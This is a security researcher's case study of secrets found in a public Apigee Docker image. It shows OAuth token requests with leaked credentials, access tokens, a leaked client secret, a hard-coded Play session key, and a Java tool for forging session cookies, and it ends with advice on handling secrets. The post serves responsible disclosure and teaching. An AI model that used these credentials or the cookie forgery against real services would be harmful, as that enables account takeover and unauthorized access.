Why you shouldn't include secrets in Docker images: a Google Cloud case study

This post covers secrets embedded in Docker images, using examples found in a public Google Cloud Docker image (Apigee), and shows how these secrets were used to exploit running services.

Background

Secrets shouldn’t be embedded in Docker images at build time. However, while doing white-box penetration tests and code reviews, we see this all the time. It’s done for simplicity, because of a lack of company routines for secret handling, by accident or, in rare cases, because there are no feasible alternatives. Most often, the image is pushed to a private registry, and the impact we can prove during a test is limited.

A couple of years ago, I was able to pull a semi-public Docker image from Apigee, a Google acquisition. It contained a number of secrets that I could use to exploit their cloud environment. This post recounts these vulnerabilities, which have since been reported to the Google Vulnerability Reward Program (VRP) and fixed.

There is nothing new in this post except the findings themselves. Our recommendation to our clients does not differ from industry best practice, but perhaps this can provide some motivation for why you shouldn’t put secrets in Docker images at build time.

Apigee Docker image

Apigee is an API management solution that Google acquired back in 2016, and it is the Google VRP application (or set of applications) in which I have found the most bugs. One reason I have found so many is that I was able to pull a Docker image containing large parts of the Apigee Edge source code. Previously, a Docker registry was available at docker.apigee.net, which allowed unauthenticated users to pull the Apigee Edge Docker image by running the following command:

```shell
docker pull docker.apigee.net/apigee-edge-aio:4.50.00
```

This image was intended for “Apigee Hybrid Cloud” users, where Apigee runs both on-premises and in the cloud as a service. It contained a large number of Apigee Java Archives (JARs), configuration files and more. JARs can be decompiled, and what you are left with is pretty close to the original source code, which is extremely valuable for someone trying to find bugs. Finding bugs with the help of source code is also what I’ve been doing during my time at Binary Security, as we believe that working closely with developers and doing white-box security testing by far outperforms the alternative. Aside from a number of other bugs found by analyzing the source code (SSRFs, path traversals, authorization bypasses and more), the image included several hard-coded passwords, which turned out to be reused in production.

How images can be leaked

In our opinion, embedding secrets in Docker images is just as bad as (if not worse than) storing them in clear text in the source code. This is because:

- Images are pulled to developers’ machines, stored and forgotten. These machines can be hacked, lost or stolen, or kept after an employee quits.

- If a single application running an image from a private registry is compromised, all the images in the registry may leak as the system running the application often has pull privileges on the registry.

- Images can be made public or shared with customers/partners, intentionally or not.

Common secrets in Docker images

Most often, we find secrets in:

- Configuration and environment files or unnecessary files added to the image

- Binaries or scripts in the container that had clear-text secrets in the source code

- Docker image history/build arguments

Config and environment files

These are often present because the Docker ADD (or COPY) instruction was run on an entire folder. We commonly find files such as .npmrc and .env, and even the entire git history when .git folders are included in the image.
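One way to catch this class of mistake is to export an image's file system with `docker export` and look for well-known sensitive names. Below is a minimal Java sketch of that check; the `RiskyFileFinder` class and its name list (just the three examples above) are illustrative assumptions, not a complete rule set.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.List;
import java.util.Set;
import java.util.stream.Collectors;
import java.util.stream.Stream;

// Sketch: walk an exported image file system and flag entries whose names
// commonly carry secrets. RISKY_NAMES is illustrative, not exhaustive.
class RiskyFileFinder {
    static final Set<String> RISKY_NAMES = Set.of(".env", ".npmrc", ".git");

    static List<Path> find(Path root) throws IOException {
        try (Stream<Path> paths = Files.walk(root)) {
            return paths
                    .filter(p -> p.getFileName() != null
                            && RISKY_NAMES.contains(p.getFileName().toString()))
                    .sorted()
                    .collect(Collectors.toList());
        }
    }

    public static void main(String[] args) throws IOException {
        // Pass the directory the image tarball was extracted into.
        Path root = Paths.get(args.length > 0 ? args[0] : ".");
        for (Path hit : find(root)) {
            System.out.println(hit);
        }
    }
}
```

Matching on exact file names keeps false positives low; a directory hit such as `.git` is reported once, and its contents can then be inspected by hand.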

In Apigee’s case, the image file system contained two interesting paths in this regard: /opt/apigee/customer/conf/ and /opt/apigee/data/edge-router/config_backup_20200627_044825.zip.

Among the files in the former, the most interesting was a valid Apigee license file. While this could possibly be abused in a real-world scenario, such findings normally don’t meet the bar for Google VRP, so I didn’t report it.

The config backup contained what appeared to be a bunch of secrets for Postgres, Cassandra, the Java JMX interface and interesting Apigee accounts such as edgeui and zms_admin. I tried those that I could (JMX wasn’t exposed 🤷‍♂️) on https://apigee.com/, but none of them seemed to work. I assumed they could be valid on some hybrid systems where customers ran Apigee on-premises and didn’t change the default secrets, but I didn’t think reporting that would qualify for a reward. As a final effort, I tried one of the secrets on another live Apigee environment, https://e2e.apigee.net/, and lo and behold…

```http
POST /oauth/token HTTP/1.1
Host: login.e2e.apigee.net
Authorization: Basic ZWRnZXVpOmVkZ2V1aXNlY3JldA==
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

grant_type=client_credentials
```

```http
HTTP/1.1 200 OK
...

{
  "scope": [
    "virtualhosts.get",
    "userroles.get",
    "users.get",
    "userroles.post",
    "userroles.put",
    "environments.get",
    "notification.get",
    "organizations.delete",
    "notification.put",
    "apigee.support",
    "organizations.get",
    "internal.put",
    "mint.get",
    "mint.post",
    "organizations.put",
    "organizations.post",
    "notification.post",
    "mint.put",
    "users.put"
  ],
  "access_token": "eyJhbGciOiJSUzI1NiJ9.eyJqdGkiOiI1ZTVkMDNhNC1hYjcxLTQ1ODEtYTEyNS01MzljZjMyMzY0N2MiLCJzdWIiOiJlZGdldWkiLCJhdXRob3JpdGllcyI6WyJ2aXJ0dWFsaG9zdHMuZ2V0IiwidXNlcnJvbGVzLmdldCIsInVzZXJzLmdldCIsInVzZXJyb2xlcy5wb3N0IiwidXNlcnJvbGVzLnB1dCIsImVudmlyb25tZW50cy5nZXQiLCJub3RpZmljYXRpb24uZ2V0Iiwib3JnYW5pemF0aW9ucy5kZWxldGUiLCJub3RpZmljYXRpb24ucHV0IiwiYXBpZ2VlLnN1cHBvcnQiLCJvcmdhbml6YXRpb25zLmdldCIsImludGVybmFsLnB1dCIsIm1pbnQuZ2V0IiwibWludC5wb3N0Iiwib3JnYW5pemF0aW9ucy5wdXQiLCJvcmdhbml6YXRpb25zLnBvc3QiLCJub3RpZmljYXRpb24ucG9zdCIsIm1pbnQucHV0IiwidXNlcnMucHV0Il0sInNjb3BlIjpbInZpcnR1YWxob3N0cy5nZXQiLCJ1c2Vycm9sZXMuZ2V0IiwidXNlcnMuZ2V0IiwidXNlcnJvbGVzLnBvc3QiLCJ1c2Vycm9sZXMucHV0IiwiZW52aXJvbm1lbnRzLmdldCIsIm5vdGlmaWNhdGlvbi5nZXQiLCJvcmdhbml6YXRpb25zLmRlbGV0ZSIsIm5vdGlmaWNhdGlvbi5wdXQiLCJhcGlnZWUuc3VwcG9ydCIsIm9yZ2FuaXphdGlvbnMuZ2V0IiwiaW50ZXJuYWwucHV0IiwibWludC5nZXQiLCJtaW50LnBvc3QiLCJvcmdhbml6YXRpb25zLnB1dCIsIm9yZ2FuaXphdGlvbnMucG9zdCIsIm5vdGlmaWNhdGlvbi5wb3N0IiwibWludC5wdXQiLCJ1c2Vycy5wdXQiXSwiY2xpZW50X2lkIjoiZWRnZXVpIiwiY2lkIjoiZWRnZXVpIiwiYXpwIjoiZWRnZXVpIiwiZ3JhbnRfdHlwZSI6ImNsaWVudF9jcmVkZW50aWFscyIsInJldl9zaWciOiI5YTM1YjI3ZCIsImlhdCI6MTU5NjAzMDg5OSwiZXhwIjoxNTk2MDMxMDc5LCJpc3MiOiJodHRwczovL2xvZ2luLmUyZS5hcGlnZWUubmV0IiwiemlkIjoidWFhIiwiYXVkIjpbImVkZ2V1aSIsInZpcnR1YWxob3N0cyIsInVzZXJyb2xlcyIsInVzZXJzIiwiZW52aXJvbm1lbnRzIiwibm90aWZpY2F0aW9uIiwib3JnYW5pemF0aW9ucyIsImFwaWdlZSIsImludGVybmFsIiwibWludCJdfQ.K0JF9BCUEQPbl-rwLsmFy92aEWHFa0fXeuSw574uHmuPUt9CmFPlM2icXtPwVwvd3Djc1Kv_PELOofGWA03KDJ_nWY9OOMb8RQnAINy1B8Umue-JkZQ7n55KZgWPFYLA89xDCNpkvLmD8RYCLDbVr12_SzBJOWqgiXjECUIy7kN5BJDIVRv6T3opa__BpWXRgGWJU12y-u_LOXWD8HAWcy5lLMnWJmi5m1_LF2inFx-Ko3g1k5iw7fLHWxNY8OS8tJvriEzHw9HMKLr1yAdOJFlS7tB9Vg4RKqp_9uk5xX9qp6elANAE-xgrpZzao45_Fb47GvMn1kWdwP_p7UmmWA"
}
```

(if you don’t feel like decoding the Basic Auth, the production password was edgeuisecret 🤫)
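HTTP Basic authentication is only a Base64 encoding of `username:password`, so anyone who sees the header recovers the credential without any key. A small Java sketch using the JDK's `java.util.Base64`; the `BasicAuthDecoder` class name is just for illustration:

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Decodes the value of an "Authorization: Basic ..." header into "user:password".
class BasicAuthDecoder {
    static String decode(String headerValue) {
        String prefix = "Basic ";
        if (!headerValue.startsWith(prefix)) {
            throw new IllegalArgumentException("not a Basic auth header");
        }
        byte[] raw = Base64.getDecoder().decode(headerValue.substring(prefix.length()).trim());
        return new String(raw, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        // Header value from the token request above
        System.out.println(decode("Basic ZWRnZXVpOmVkZ2V1aXNlY3JldA==")); // prints edgeui:edgeuisecret
    }
}
```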



Notice the token’s OAuth scopes? Even before testing the token, I knew it was powerful. I could edit all users and organizations, send notifications, make changes to the monetization system (“mint”) configuration and use the mysterious internal.put scope. Before reporting it, I tested it on the live users API just to make sure:

A 452 kB response suggested thousands of users, so this was definitely a valid bug. Google quickly acknowledged the bug and rewarded it as a “significant security bypass”.

Similarly, the backup contained another credential pair for the ZMS admin API:

```http
GET /oauth/token?grant_type=client_credentials HTTP/1.1
Host: login.e2e.apigee.net
Authorization: Basic bWdtdC16bXMtYWRtaW46LyF6XzNDLnJXMFBxM3N1Mm89YzE=
Connection: close
```

```http
HTTP/1.1 200 OK
...

{
  "scopes": ["zms.admin"],
  "access_token": "eyJhbGciOiJSUzI1NiJ9.eyJqdGkiOiI5NTQyMzMyNi1hODI0LTRiZDYtODU5OC05NDQzZGViNGQxZTgiLCJzdWIiOiJtZ210LXptcy1hZG1pbiIsImF1dGhvcml0aWVzIjpbInptcy5hZG1pbiJdLCJzY29wZSI6WyJ6bXMuYWRtaW4iXSwiY2xpZW50X2lkIjoibWdtdC16bXMtYWRtaW4iLCJjaWQiOiJtZ210LXptcy1hZG1pbiIsImF6cCI6Im1nbXQtem1zLWFkbWluIiwiZ3JhbnRfdHlwZSI6ImNsaWVudF9jcmVkZW50aWFscyIsInJldl9zaWciOiJiNGQyYjZlYiIsImlhdCI6MTU5NTg2NDc3MSwiZXhwIjoxNTk1ODY4MzcxLCJpc3MiOiJodHRwczovL2xvZ2luLmUyZS5hcGlnZWUubmV0IiwiemlkIjoidWFhIiwiYXVkIjpbIm1nbXQtem1zLWFkbWluIiwiem1zIl19.bEpX1gi-VAje_dOc78zgLiMi61-NUUU-Sj604xSzjO-Ku8OaiqxX2YJAajnCzrXCEHOvn1fhtOmJC8U__DZrfDkgb6PBdmMt9W011v1gsK7P6QkhGk_yNpaXFwwG29EY2bfmXC3vTwmlg2hDpki1NUJfezbG6VjRQIPnXqj5NNirHDF-Jm7LlgUk0rziti1yEe25pIG5gZAyiQ2-Qo-i_Sbo0WrJamb3gLk1tk2vvhnRLXtJOh6vcB8y5hXxs8eN02sO1PUtkwpNo_BMC0mZ32jYKPZqHJpGKB8s4DhwYbf_35LhIZlUBumWvDqkcwPEhzKwU0C1t1ugL0lZA0c-TQ"
}
```
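A token's audience can be read without any key: a compact JWT is three base64url segments separated by dots, and the middle one is the JSON claims set. Decoding the claims of the zms token above shows an `aud` of `mgmt-zms-admin` and `zms`, whereas the edgeui token's `aud` starts with `edgeui`. A minimal Java sketch (the `JwtPeek` name is illustrative); note that it performs no signature verification and is only meant for reading claims:

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Returns the (unverified) claims JSON of a compact JWT "header.payload.signature".
// This does NOT validate the signature; it only makes the claims human-readable.
class JwtPeek {
    static String claims(String jwt) {
        String[] parts = jwt.split("\\.");
        if (parts.length != 3) {
            throw new IllegalArgumentException("expected three dot-separated segments");
        }
        // JWT segments are unpadded base64url; the JDK's URL decoder accepts missing padding.
        byte[] json = Base64.getUrlDecoder().decode(parts[1]);
        return new String(json, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        if (args.length != 1) {
            System.err.println("usage: JwtPeek <access_token>");
            return;
        }
        System.out.println(claims(args[0]));
    }
}
```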

The audience for this token was different from edgeui’s, so it didn’t work on the “regular” backend API. However, my recon database contained a couple of zms subdomains, and the token worked on one of them. Since this API was unknown to me, I had to use a directory fuzzer to find the API path and use the API error messages to infer the required parameters. Using a wordlist built from other vulnerabilities I had found previously, I was able to guess a few valid organization IDs and construct a valid API request:

```http
GET /v1/mgmt/zones?orgs=apigee-svc-sonar&orgs= HTTP/1.1
Host: zms.e2e.apigee.net
Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJqdGkiOiI5NTQyMzMyNi1hODI0LTRiZDYtODU5OC05NDQzZGViNGQxZTgiLCJzdWIiOiJtZ210LXptcy1hZG1pbiIsImF1dGhvcml0aWVzIjpbInptcy5hZG1pbiJdLCJzY29wZSI6WyJ6bXMuYWRtaW4iXSwiY2xpZW50X2lkIjoibWdtdC16bXMtYWRtaW4iLCJjaWQiOiJtZ210LXptcy1hZG1pbiIsImF6cCI6Im1nbXQtem1zLWFkbWluIiwiZ3JhbnRfdHlwZSI6ImNsaWVudF9jcmVkZW50aWFscyIsInJldl9zaWciOiJiNGQyYjZlYiIsImlhdCI6MTU5NTg2NDc3MSwiZXhwIjoxNTk1ODY4MzcxLCJpc3MiOiJodHRwczovL2xvZ2luLmUyZS5hcGlnZWUubmV0IiwiemlkIjoidWFhIiwiYXVkIjpbIm1nbXQtem1zLWFkbWluIiwiem1zIl19.bEpX1gi-VAje_dOc78zgLiMi61-NUUU-Sj604xSzjO-Ku8OaiqxX2YJAajnCzrXCEHOvn1fhtOmJC8U__DZrfDkgb6PBdmMt9W011v1gsK7P6QkhGk_yNpaXFwwG29EY2bfmXC3vTwmlg2hDpki1NUJfezbG6VjRQIPnXqj5NNirHDF-Jm7LlgUk0rziti1yEe25pIG5gZAyiQ2-Qo-i_Sbo0WrJamb3gLk1tk2vvhnRLXtJOh6vcB8y5hXxs8eN02sO1PUtkwpNo_BMC0mZ32jYKPZqHJpGKB8s4DhwYbf_35LhIZlUBumWvDqkcwPEhzKwU0C1t1ugL0lZA0c-TQ
Connection: close
```

```http
HTTP/1.1 200 OK
...

{
  "zones": [
    {
      "ID": "dcab7ead-4364-4a6d-a7c2-8048df48a898",
      "UAAZoneID": "google",
      "Name": "google",
      "AdminClientID": "google-admin-wvqd",
      "AdminClientSecret": "3j1IfAghgiqFbIaP",
      "ClientsCredentials": {
        "edgeui": "",
        "unifiedui": "",
        "edgecli": "",
        "devportaladmin": "",
        "useradmin": ""
      },
      "CreatedTime": 1490737872539,
      "ModifiedTime": 1490737872539,
      "Type": "edge",
      "Deleted": false
    }
  ]
}
```

The response contains the organization’s client credentials in clear text (AdminClientID:AdminClientSecret), which in turn could be used to create new access tokens in the google identity zone:

```http
GET /oauth/token?grant_type=client_credentials HTTP/1.1
Host: google.login.e2e.apigee.net
Authorization: Basic Z29vZ2xlLWFkbWluLXd2cWQ6M2oxSWZBZ2hnaXFGYklhUA==
Connection: close
```

With the resulting access token, I could now log into Google’s own Apigee instance.
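Turning leaked client credentials into a token is just the OAuth 2.0 client credentials grant with HTTP Basic client authentication. The sketch below rebuilds the google zone request with `java.net.http` (Java 11+) without sending it; it mirrors the GET form used against this endpoint, while RFC 6749 specifies POST for token requests. `ClientCredentialsRequest` is an illustrative name, and the `Connection: close` header is omitted because the JDK client manages connections itself.

```java
import java.net.URI;
import java.net.http.HttpRequest;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Builds (but does not send) an OAuth 2.0 client_credentials token request
// authenticated with HTTP Basic, mirroring the GET request shown above.
class ClientCredentialsRequest {
    static String basicHeader(String clientId, String clientSecret) {
        String pair = clientId + ":" + clientSecret;
        return "Basic " + Base64.getEncoder()
                .encodeToString(pair.getBytes(StandardCharsets.UTF_8));
    }

    static HttpRequest build(String tokenEndpoint, String clientId, String clientSecret) {
        return HttpRequest.newBuilder()
                .uri(URI.create(tokenEndpoint + "?grant_type=client_credentials"))
                .header("Authorization", basicHeader(clientId, clientSecret))
                .GET()
                .build();
    }
}
```

The point of the example is how little is needed: the client ID and secret from the zones response are the entire credential.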

As with the other client credentials I reported, Google acknowledged my report and fixed it quickly.

Secrets in source code

Secrets in source code often end up in Docker images through runnable binaries/scripts, and the Apigee image was no exception.

The image contained a lot of Java archives (JARs), 1,102 to be exact. Some of these were public libraries, but many were internal. The nice thing about Java archives is that they normally decompile just fine, and you end up with something pretty close to the original source code. A simplified version of what I did to extract the source code from the image is as follows:

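```shell
# Create (but don't start) a container from the image and export its file system
docker export -o image.tar "$(docker create docker.apigee.net/apigee-edge-aio:4.50.00)"
# docker export writes an uncompressed tarball, so no -z flag
mkdir rootfs && tar -xf image.tar -C rootfs
# List every Java archive in the image
find rootfs -name "*.jar"
```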

The commands above create a container from the image, export its file system and find all the Java archives. I then ran the archives through a Java decompiler, such as jd-cli, and was free to browse the source code.
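Before decompiling anything, it can pay off to list the configuration files packed inside the archives themselves, since secrets often live in properties files rather than in code. A minimal sketch using `java.util.jar.JarFile`; the `JarConfigLister` name and the list of suffixes are assumptions to adapt to your own stack:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import java.util.stream.Collectors;
import java.util.stream.Stream;

// Sketch: list configuration-like entries inside every JAR under a directory.
class JarConfigLister {
    // Illustrative suffixes; extend as needed.
    static final List<String> SUFFIXES = List.of(".properties", ".conf", ".yml", ".yaml");

    static List<String> configEntries(Path jarPath) throws IOException {
        List<String> hits = new ArrayList<>();
        try (JarFile jar = new JarFile(jarPath.toFile())) {
            for (JarEntry e : Collections.list(jar.entries())) {
                String name = e.getName();
                if (!e.isDirectory() && SUFFIXES.stream().anyMatch(name::endsWith)) {
                    hits.add(name);
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) throws IOException {
        Path root = Paths.get(args.length > 0 ? args[0] : ".");
        List<Path> jars;
        try (Stream<Path> paths = Files.walk(root)) {
            jars = paths.filter(p -> Files.isRegularFile(p) && p.toString().endsWith(".jar"))
                    .sorted()
                    .collect(Collectors.toList());
        }
        for (Path jar : jars) {
            try {
                for (String entry : configEntries(jar)) {
                    System.out.println(jar + "!/" + entry);
                }
            } catch (IOException e) {
                System.err.println("skipping unreadable archive " + jar + ": " + e.getMessage());
            }
        }
    }
}
```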



One of the first things I did with the source was to grep through it for further secrets. The first valid secret I found was used with org.jasypt.encryption.pbe.StandardPBEStringEncryptor to encrypt a string containing a timestamp and the username. The encrypted string served as the password reset token issued when calling https://enterprise.e2e.apigee.net/sendPassword. A token forged with the secret was accepted by /setpassword, but the call did not actually change the user’s password. I chalked this up to Google having deprecated the feature and moved on. This still works, so even though the impact is unclear, I’m not including the secret in this post.
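The underlying weakness is generic: if a token's only protection is a key baked into the shipped code, anyone holding the image can mint tokens that the server will accept. The sketch below illustrates this with JDK primitives (PBKDF2 key derivation plus AES-GCM) rather than jasypt's own algorithm; the `timestamp|username` format, the placeholder password and the static salt are all hypothetical, and this is not Apigee's implementation.

```java
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

// Illustration only: a reset token encrypted under a key derived from a HARD-CODED
// password. Whoever extracts the password (e.g. from a Docker image) can call mint()
// exactly like the server does.
class HardcodedKeyToken {
    static final char[] EMBEDDED_PASSWORD = "hardcoded-password".toCharArray(); // hypothetical
    static final byte[] SALT = "static-salt".getBytes(StandardCharsets.UTF_8);   // hypothetical

    static SecretKeySpec key() throws Exception {
        SecretKeyFactory f = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
        byte[] k = f.generateSecret(new PBEKeySpec(EMBEDDED_PASSWORD, SALT, 100_000, 128)).getEncoded();
        return new SecretKeySpec(k, "AES");
    }

    // Encrypts "timestamp|username" (hypothetical format) as base64url(iv || ciphertext).
    static String mint(String username, long timestampMillis) throws Exception {
        byte[] iv = new byte[12];
        new SecureRandom().nextBytes(iv);
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, key(), new GCMParameterSpec(128, iv));
        byte[] ct = c.doFinal((timestampMillis + "|" + username).getBytes(StandardCharsets.UTF_8));
        byte[] token = ByteBuffer.allocate(iv.length + ct.length).put(iv).put(ct).array();
        return Base64.getUrlEncoder().withoutPadding().encodeToString(token);
    }

    // Server side: decrypt and trust whatever username is inside.
    static String open(String token) throws Exception {
        byte[] all = Base64.getUrlDecoder().decode(token);
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.DECRYPT_MODE, key(), new GCMParameterSpec(128, all, 0, 12));
        return new String(c.doFinal(all, 12, all.length - 12), StandardCharsets.UTF_8);
    }
}
```

Strong algorithms do not help here: authenticated encryption stops tampering by outsiders, but not someone who holds the same key material.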

Another secret embedded in the Java code was used by the Play Framework to sign the session cookies and encrypt parts of them.

The PLAY_SESSION cookie had the format {play_signature}-organization={org}&access_token={jwt}&role={role}&username={play_encrypted_username}&refresh_token={jwt}&isZone=0&csrfToken={csrf}, and it turned out that changing only the username and the signature was enough to access any user account based on its email address.

I wrote the following Java snippet to forge my own session cookie, which let me log in as the target user/role.

```java
package org.binarysecurity;

import play.api.libs.CryptoConfig;
import play.api.libs.Crypto;
import scala.Option;

public class Main {

    // This is the key that is used in the server config (application.secret in edge-ui-4.50.00-0.0.20161/token/default.propertie)
    public static String key = "597nYjAnwEF7PvU8aYCasNkwNflQBCrcV1YuWdi61VjJ9L6uUIF18zleBWZlWepo";

    public static Crypto getCrypto() {
        // When no transformation is applied, this is apparently the default (from https://github.com/playframework/playframework/pull/3595)
        String transformation = "AES/CTR/NoPadding";
        final Option<String> provider = Option.apply(null);
        CryptoConfig cc = new CryptoConfig(key, provider, transformation);
        return new Crypto(cc);
    }

    public static String decrypt(String encrypted) {
        return getCrypto().decryptAES(encrypted);
    }

    public static String encrypt(String decrypted) {
        return getCrypto().encryptAES(decrypted);
    }

    public static String sign(String data) {
        return getCrypto().sign(data);
    }

    public static void help() {
        System.out.println("Usage: java -jar play_recryptor.jar encrypt/decrypt/sign value [application.secret]");
        System.exit(1);
    }

    public static void main(String[] args) {
        if (args.length < 2) {
            help();
        } else if (args.length == 3) {
            key = args[2];
        }

        String output = "";
        switch (args[0]) {
            case "encrypt":
                output = encrypt(args[1]);
                break;
            case "decrypt":
                output = decrypt(args[1]);
                break;
            case "sign":
                output = sign(args[1]);
                break;
            default:
                help();
        }
        System.out.println(output);
    }
}
```
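The forgery works because the cookie's signature is a keyed MAC over the cookie data, so knowing `application.secret` is equivalent to being able to sign arbitrary sessions. The JDK-only sketch below assumes that the Play 2.x version in use computes `Crypto.sign` as hex-encoded HMAC-SHA1 and assembles a cookie in the `{signature}-{data}` shape described above. It does not reproduce the AES encryption of the username, which the snippet above handles with `encryptAES`; `PlayCookieSigner` is an illustrative name.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

// Sketch of a Play 2.x-style cookie signature, ASSUMING hex(HMAC-SHA1(secret, data)).
class PlayCookieSigner {
    static String sign(String data, String secret) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(secret.getBytes(StandardCharsets.UTF_8), "HmacSHA1"));
        StringBuilder hex = new StringBuilder();
        for (byte b : mac.doFinal(data.getBytes(StandardCharsets.UTF_8))) {
            hex.append(String.format("%02x", b));
        }
        return hex.toString();
    }

    // Cookie value in the "{signature}-{data}" shape described in the post.
    static String cookie(String data, String secret) throws Exception {
        return sign(data, secret) + "-" + data;
    }

    // Server-side check: recompute the MAC over the data and compare in constant time.
    static boolean verify(String cookieValue, String secret) throws Exception {
        int dash = cookieValue.indexOf('-');
        if (dash < 0) {
            return false;
        }
        byte[] given = cookieValue.substring(0, dash).getBytes(StandardCharsets.UTF_8);
        byte[] expected = sign(cookieValue.substring(dash + 1), secret).getBytes(StandardCharsets.UTF_8);
        return MessageDigest.isEqual(given, expected);
    }
}
```

The server's check and the attacker's forgery are the same computation; only secrecy of the key separates them.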

A full video showing the proof-of-concept attack can be found here:

Docker build arguments

Secrets in Docker build arguments are rarer than secrets embedded in image files, but I wanted to include the concept all the same.

The gist is that values set with the ARG and ENV instructions are recorded in the image history metadata and can be read back with the docker history command. Take the following Dockerfile as an example:

```dockerfile
FROM alpine:latest
ARG github_username=chhans
ARG github_token=ghp_jKigknNokaLOMlsnJKSKnOP
ENTRYPOINT whoami
```

The build arguments can be extracted from the built image as follows:

```console
$ docker history build-arg-test --no-trunc
IMAGE CREATED CREATED BY SIZE COMMENT
sha256:538ffc86d6b2f3e7095430524e4137ec58487049a6efa89eee881bb4d25e13f0 5 weeks ago ENTRYPOINT ["/bin/sh" "-c" "whoami"] 0B buildkit.dockerfile.v0
<missing> 5 weeks ago ARG github_token=ghp_jKigknNokaLOMlsnJKSKnOP 0B buildkit.dockerfile.v0
<missing> 5 weeks ago ARG github_username=chhans 0B buildkit.dockerfile.v0
<missing> 5 weeks ago /bin/sh -c #(nop) CMD ["/bin/sh"] 0B
<missing> 5 weeks ago /bin/sh -c #(nop) ADD file:9bd9ea42a9f3bdc769e80c6b8a4b117d65f73ae68e155a6172a1184e7ac8bcc1 in / 7.46MB
```

For multi-stage builds, arguments from earlier stages will not necessarily propagate to the final image’s history.
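This check is easy to automate in a pipeline. Below is a minimal Java sketch that flags `ARG`/`ENV` history entries whose variable names look secret-bearing. The input is assumed to be the CREATED BY column, for example from `docker history --no-trunc --format '{{.CreatedBy}}' <image>`; the keyword list and the `HistorySecretFlagger` name are illustrative assumptions.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Flags ARG/ENV entries in `docker history` output whose variable names look sensitive.
class HistorySecretFlagger {
    // Matches "ARG name=value" or "ENV NAME=value" anywhere in a CREATED BY entry.
    static final Pattern ASSIGN =
            Pattern.compile("\\b(ARG|ENV)\\s+([A-Za-z_][A-Za-z0-9_]*)=(\\S*)");
    // Illustrative keywords; extend to match your organization's naming.
    static final List<String> KEYWORDS =
            List.of("token", "secret", "password", "passwd", "apikey", "api_key");

    static List<String> flag(List<String> createdByLines) {
        List<String> hits = new ArrayList<>();
        for (String line : createdByLines) {
            Matcher m = ASSIGN.matcher(line);
            while (m.find()) {
                String name = m.group(2).toLowerCase(Locale.ROOT);
                if (KEYWORDS.stream().anyMatch(name::contains)) {
                    // Report the instruction and variable name, never the value itself.
                    hits.add(m.group(1) + " " + m.group(2));
                }
            }
        }
        return hits;
    }
}
```

Reporting only the variable name keeps the scanner's own output from becoming another place where the secret leaks.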

What you should do

Ideally, secrets should be stored in a dedicated secret vault and loaded at runtime when needed. Depending on how often the secret is used, it can be kept in memory for the lifetime of the running container.
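On the application side, this means reading the secret when the container starts instead of at build time. The sketch assumes the secret is delivered either as a file (Docker Swarm and Compose mount secrets under `/run/secrets/<name>`) or as an environment variable set by the orchestrator or vault integration; the `RuntimeSecrets` class and the `db_password` name are hypothetical.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Map;
import java.util.Optional;

// Loads a secret at runtime: first from a mounted secret file, then from an env var.
// Nothing secret is baked into the image.
class RuntimeSecrets {
    static Optional<String> load(String name, Path secretsDir, Map<String, String> env)
            throws IOException {
        Path file = secretsDir.resolve(name);
        if (Files.isRegularFile(file)) {
            return Optional.of(Files.readString(file, StandardCharsets.UTF_8).strip());
        }
        return Optional.ofNullable(env.get(name.toUpperCase(Locale.ROOT)));
    }

    public static void main(String[] args) throws IOException {
        // Fail fast at startup if the secret was not provided.
        String dbPassword = load("db_password", Paths.get("/run/secrets"), System.getenv())
                .orElseThrow(() -> new IllegalStateException("db_password not provided"));
        System.out.println("loaded db_password (" + dbPassword.length() + " chars)"); // never log the value
    }
}
```

Passing the directory and environment map as parameters keeps the loader testable without touching the real `/run/secrets`.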

Many secrets that end up in images are unintentional and it’s important to avoid and detect these cases as well. We recommend that you:

- Don’t add the source code directory to the image. This often includes the .git folder and more.

- If the application is built with Docker, use a separate build stage and copy only the resulting artifacts into the image that is pushed to the registry.

- Use a Docker secret mount (RUN --mount=type=secret) to handle build secrets. Alternatively, use the secret only in an earlier build stage, but secret mounts should be preferred.

- Prevent and detect secrets being added to source code and images.

- Have a system in place that enables quick and easy secret rotation for when secrets do leak, as this will happen from time to time.

To prevent secrets from being committed to source code, you can use GitHub Advanced Security’s push protection or an open-source alternative such as git-secrets. To detect secrets embedded in images, tools such as TruffleHog, gitleaks or Semgrep can be used. Any default regular expressions should be extended to fit the types of secrets used in your organization. We have had success using Semgrep for finding secrets, as its rule engine makes it easy to reduce false positives without writing highly complex regular expressions.
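To illustrate what extending the default patterns means, here is a minimal line-based regex scanner in Java with generic rules plus one organization-specific rule. All patterns are assumptions for illustration: the `ghp_` rule is a loose match on GitHub's personal access token prefix, and `ACME_INTERNAL_` is a made-up internal format. Dedicated tools add much more (entropy checks, allowlists, credential verification).

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

// Minimal line-based secret scanner with named rules, showing how
// organization-specific rules can be layered on top of generic ones.
class SecretScanner {
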